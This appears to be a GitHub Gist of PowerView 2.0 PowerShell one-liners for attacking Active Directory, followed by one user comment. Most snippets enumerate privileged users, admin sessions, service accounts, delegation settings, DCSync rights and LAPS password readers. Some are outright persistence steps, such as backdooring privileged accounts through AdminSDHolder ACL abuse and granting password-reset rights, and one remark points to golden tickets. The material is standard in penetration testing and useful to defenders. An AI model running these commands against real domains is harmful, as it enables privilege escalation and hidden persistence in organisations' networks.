Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (
# has an updated tricks Gist at
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }
# get all users with passwords changed > 1 year ago
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"
# all enabled users
Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"
# all disabled users
Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
# all users that require smart card authentication
Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# all users that don't require smart card authentication
Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation
$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount
# enumerate servers that allow unconstrained kerberos delegation and show all users logged in
Invoke-UserHunter -Unconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}}
# find all users with an SPN set (likely service accounts)
Get-NetUser -SPN
# find all service accounts in "Domain Admins"
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# hunt for all privileged users (adminCount=1)
Invoke-UserHunter -AdminCount
# find users with sidHistory set
Get-NetUser -Filter '(sidHistory=*)'
# enumerate all gobal catalogs in the forest
# turn a list of computer short names to FQDNs
gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"}
# find interesting .vbs/.bat/.ps1 scripts on domain controllers
Invoke-FileFinder -SearchSYSVol
# enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through
$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
# enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default
$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
# enumerate what machines that a particular group has local admin rights to
Find-GPOLocation -GroupName <GROUP>
# enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC
Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP
# export a csv of all GPO mappings
Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs
# grant user 'will' the rights to change 'matt's password
Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
# find linked DA accounts using name correlation
Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname
# save a PowerView object to disk for later usage
Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out
# Find any machine accounts in privileged groups
Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users have some kind of modify rights
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}
# find all policies applied to a current machine
Get-NetGPO -ComputerName WINDOWS1.testlab.local
# find the user/groups that have read access to the LAPS password property for a specified computer
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |
Select-Object -ExpandProperty distinguishedname |
ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {
Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
} | Where-Object {
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
} | ForEach-Object {
Convert-NameToSid $_.IdentityReference
} | Select-Object -ExpandProperty SID | Get-ADObject
# get the ACLs for all OUs where someone is allowed to read the LAPS password attribute
Get-NetOU -FullData |
Get-ObjectAcl -ResolveGUIDs |
Where-Object {
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
} | ForEach-Object {
$_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
# perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv
Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv
# return all universal security groups in a forest with foreign members
Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object {
$GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
$_.Member = $_.Member | ForEach-Object {
$MemberDomain = $_.subString($_.IndexOf("DC="))
if($GroupDomain -ne $MemberDomain) {
} | Where-Object {$_.Member}

This comment has been minimized.

Copy link

agrawalsmart7 commented Oct 13, 2019

The argument -GroupName in Get-NetGroupMember is not taking any group. I have a group named Vulnerable_Group and I tried this cmdlet Get-NetGroupMember -GroupName Vulnerable_Group but still, it didn't show anything. There is one user in that group but this didn't show anything. Please suggest something, it would be great.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.